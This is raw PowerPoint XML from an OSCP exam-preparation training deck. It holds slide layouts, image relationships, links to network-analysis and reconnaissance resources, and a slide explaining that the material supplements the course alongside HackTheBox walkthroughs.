      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22012515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dirty="0"/>
              <a:t>Slide with image</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34917259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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26429899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1686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ue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nchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100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560834" y="4090988"/>
            <a:ext cx="4687887" cy="628650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit date</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22344698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228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="2400"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="466725" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="690563" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="18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p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12125676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ue 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6720" y="2926080"/>
            <a:ext cx="10515600" cy="840230"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:defRPr sz="3600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Section Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="189914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Blank with Foot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8FEB66-D58C-4868-8D7B-9EAE0C9533BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41040262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10036663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ue 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28945964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ue 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nchor="b"/>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7BC50528-D44C-4D0C-8A92-A13CA744695F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1920240"/>
            <a:ext cx="11338560" cy="4023360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9082727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ue 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FE4215-CB31-416D-AD8E-2EB300E4A45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09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ue Blank with Foot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8FEB66-D58C-4868-8D7B-9EAE0C9533BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33686616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e Closing Slide Contact Inf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9320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11898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dirty="0"/>
              <a:t>Section Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13288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Closing Slide Contact Inf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3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5.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1" y="6400800"/>
            <a:ext cx="622739" cy="182880"/>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9768"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29768" y="1371600"/>
            <a:ext cx="11338851"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90880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dirty="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03651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81772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522124"/>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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="223622851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1" y="6400800"/>
            <a:ext cx="622739" cy="182880"/>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9768"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29768" y="1371600"/>
            <a:ext cx="11338851"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057819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dirty="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xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image121.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image125.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image124.png"/></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0.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image129.png"/><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0.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image133.png"/><Relationship Id="rId4"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ib3rius/AutoRecon" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout35.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0.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1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57.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2.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5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7.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide12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7.xml"/></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7.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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7.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image171.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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7.xml"/></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9.png"/><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7.xml"/><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4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7.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image194.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image193.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide14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5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7.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image205.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image204.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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7.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide14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7.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide14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7.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide14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5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3.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout57.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide151.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5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5.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout57.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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6.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5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57.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image219.png"/></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7.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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57.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image226.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image225.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide16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57.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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57.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide16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7.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide16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7.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide16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57.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide16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7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18.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout57.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image239.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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57.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image242.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide17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0.png"/><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7.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide174.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5.png"/><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6.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7.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18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57.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18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57.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18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57.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18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7.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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57.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18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9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5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57.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide19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57.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image263.gi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7.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5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1.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78.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image267.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image266.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide202.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2.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image271.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image270.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image275.svg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide203.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71.sv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svg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide20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8.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide205.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image281.svg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image283.svg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image280.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout78.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image282.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image273.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27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svg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image285.svg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image280.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout78.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image284.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image273.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image272.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image283.sv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8.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image289.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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8.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image293.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image292.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide21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svg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image285.svg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image280.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout78.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image284.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image273.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image272.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image283.sv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9.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout78.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image295.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3.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout78.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide215.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svg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image285.svg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image280.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout78.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image284.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image273.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image272.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image283.svg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide21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8.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide21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8.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide21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8.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30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8.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide22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8.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide22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8.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide22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78.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image313.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image312.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide23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78.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide23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8.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31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3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8.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide235.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8.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide23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78.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide23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8.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide23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8.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide23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24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8.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide241.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8.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide24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8.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide24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8.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide24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8.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide24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8.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide246.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8.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide247.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8.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide248.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://packetlife.net/media/library/12/tcpdump.pdf" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stationx-public-download.s3.us-west-2.amazonaws.com/Wireshark-Cheat-Sheet-v1.pdf" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout78.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/wireshark-tutorial-decrypting-https-traffic/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.netresec.com/?page=NetworkMiner" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide24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250.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8.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide25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2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7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7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6.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8.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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8.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide258.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8.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide259.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62.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image347.jpg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout78.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide263.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264.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1.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image352.svg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image269.svg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image351.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout78.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image268.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image354.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35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3.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78.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image354.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image353.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide274.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78.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image354.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image353.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide275.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78.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image354.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image353.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide276.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78.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image354.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image353.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide277.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78.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image356.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35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7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9.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout8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8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86.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide28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86.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide287.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86.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide288.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8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91.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86.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide29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8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9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8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96.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86.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide297.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8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8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8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5.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306.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307.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308.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309.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image269.svg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image275.svg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image268.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout78.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5.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5.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5.xml"/><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hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-41316" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image101.png"/><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5.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image115.png"/><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1A5E8-8BE9-4881-BF37-B7ED4BF8EE95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Notes on the Material</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D181EA2-37FB-4BD7-92FE-84E20130845C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>This material was created to help a group of junior and senior engineers feel comfortable to pursue the OSCP. The slides are intentionally verbose so the group could review the material after the session.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>It is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> a replacement for the course, rather providing entry information to the major subjects the OSCP syllabus addresses (as of 2020).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Material was intermixed with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>HackTheBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> walkthroughs to demonstrate the lessons, where appropriate.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="273970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4E939C-E132-408E-84D2-2038BEA721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29B8212-4F21-4899-BD66-9CE65459728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79A69E96-9B53-49CD-93DC-AD6CB7BF0872}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
